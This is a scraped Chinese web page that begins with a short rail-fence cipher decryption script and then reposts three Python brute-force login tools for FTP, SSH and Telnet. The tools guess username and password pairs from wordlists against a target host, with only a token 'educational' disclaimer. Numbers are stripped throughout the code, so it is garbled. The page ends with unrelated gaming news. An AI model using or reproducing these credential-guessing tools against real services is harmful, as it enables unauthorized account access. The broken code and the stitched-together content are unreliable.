今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。
方法一(通用脚本):
#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e) field=[] for i in range(,elen): if(elen%i==): field.append(i) for f in field: b = elen / f result = {x:‘‘ for x in range(b)} for i in range(elen): a = i % b; result.update({a:result[a] + e[i]}) d = ‘‘ for i in range(b): d = d + result[i] print ‘分为\t‘+str(f)+‘\t‘+‘栏时,解密结果为: ‘+d
方法二:
FTP暴力破解脚本
#!/usr/bin/env python #-*-coding = utf--*- #author:@xfk #blog:@blog.sina.com.cn/kaiyongdeng #date:@-- import sys, os, time from ftplib import FTP docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ftp_bf.py [*] Coder : [*] Version : . [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\[m"; G = "\[m"; Y = "\[m" END = "\[m" def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ftp_bf.py v.. |" print " | FTP Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.strftime("%X") print docs+END def help(): print R+"[*]-t, --target ip/hostname <> Our target" print "[*]-u, --usernamelist usernamelist <> usernamelist path" print "[*]-p, --passwordlist passwordlist <> passwordlist path" print "[*]-h, --help help <> print this help" print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit() def bf_login(hostname,username,password): # sys.stdout.write("\r[!]Checking : %s " % (p)) # sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(hostname,username, password) ftp.retrlines('list') ftp.quit() print Y+"\n[!] wt,wt!!! We did it ! " print "[+] Target : ",hostname, "" print "[+] User : ",username, "" print "[+] Password : ",password, ""+END return # sys.exit() except Exception, e: pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END sys.exit() def anon_login(hostname): try: print G+"\n[!] Checking for anonymous login.\n"+END ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END ftp.quit() except Exception, e: print R+"\n[-] Anonymous login failed...\n"+END pass def main(): logo() try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--usernamelist': usernamelist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-p' or arg.lower() == '--passwordlist': passwordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"[!] BruteForcing target ..."+END anon_login(hostname) # print "here is ok" # print hostname try: usernames = open(usernamelist, "r") user = usernames.readlines() count = while count < len(user): user[count] = user[count].strip() count += except: print R+"\n[-] Cheak your usernamelist path\n"+END sys.exit() # print "here is ok ",usernamelist,passwordlist try: passwords = open(passwordlist, "r") pwd = passwords.readlines() count = while count < len(pwd): pwd[count] = pwd[count].strip() count += except: print R+"\n[-] Check your passwordlist path\n"+END sys.exit() print G+"\n[+] Loaded:",len(user),"usernames" print "\n[+] Loaded:",len(pwd),"passwords" print "[+] Target:",hostname print "[+] Guessing...\n"+END for u in user: for p in pwd: result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) if result != : print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END else: print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END if not result : print R+"\n[-]There is no username ans password enabled in the list." print "[-]Exiting...\n"+END if __name__ == "__main__": main()
SSH暴力破解
#!/usr/bin/env python #-*-coding = UTF--*- #author@:dengyongkai #blog@:blog.sina.com.cn/kaiyongdeng import sys import os import time #from threading import Thread try: from paramiko import SSHClient from paramiko import AutoAddPolicy except ImportError: print G+''' You need paramiko module. http://www.lag.net/paramiko/ Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n'''+END sys.exit() docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ssh_bf.py [*] Author : xfk [*] Version : v.. [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """ if sys.platform == 'linux' or sys.platform == 'linux': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\[m"; G = "\[m"; Y = "\[m" END = "\[m" def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | // ssh_bf.py v.. |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.ctime() print docs+END def help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is )" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit() def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return status def makelist(file): ''' Make usernames and passwords lists ''' items = [] try: fd = open(file, 'r') except IOError: print R+'unable to read file \'%s\'' % file+END pass except Exception, e: print R+'unknown error'+END pass for line in fd.readlines(): item = line.replace('\n', '').replace('\r', '') items.append(item) fd.close() return items def main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[:].index(arg))+]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[:].index(arg))+] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= : help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"\n[!] BruteForcing target ...\n"+END # print "here is ok" # print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist) print Y+"[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......."+END try: for username in usernamelist: for password in passwordlist: print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END current = BruteForce(hostname, port, username, password) if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END # pass else: print G+"\n[+] ^-^ HaHa,We Got It!!!" print "[+] username: %s" % username print "[+] password: %s\n" % password+END # sys.exit() except: print R+"\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n"+END raise print Y+"[+] Done.^-^\n"+END sys.exit() if __name__ == "__main__": main()
TELNET密码暴力破解
#!usr/bin/python #Telnet Brute Forcer #http://www.darkcde.com #dhydr[at]gmail[dot]com import threading, time, random, sys, telnetlib from copy import copy if len(sys.argv) !=: print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" sys.exit() try: users = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit() try: words = open(sys.argv[], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit() print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v." print "\t--------------------------------------------------\n" print "[+] Server:",sys.argv[] print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words),"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != : value = random.sample(words, ) words.remove(value[]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, ) users.remove(users[]) lock.release() if len(users) ==: return value[][:-], users[] else: return value[][:-], users[][:-] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"* print "User:",user,"Password:",value tn = telnetlib.Telnet(sys.argv[]) tn.read_until("login: ") tn.write(user + "\n") if password: tn.read_until("Password: ") tn.write(value + "\n") tn.write("ls\n") tn.write("exit\n") print tn.read_all() print "\t\nLogin successful:",value, user tn.close() work.join() sys.exit() except: pass for I in range(len(words)*len(users)): work = Worker() work.start() time.sleep()
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件!
如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
狼山资源网 Copyright www.pvsay.com
暂无“Python脚本暴力破解栅栏密码”评论...
稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!
昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。
这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。
而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?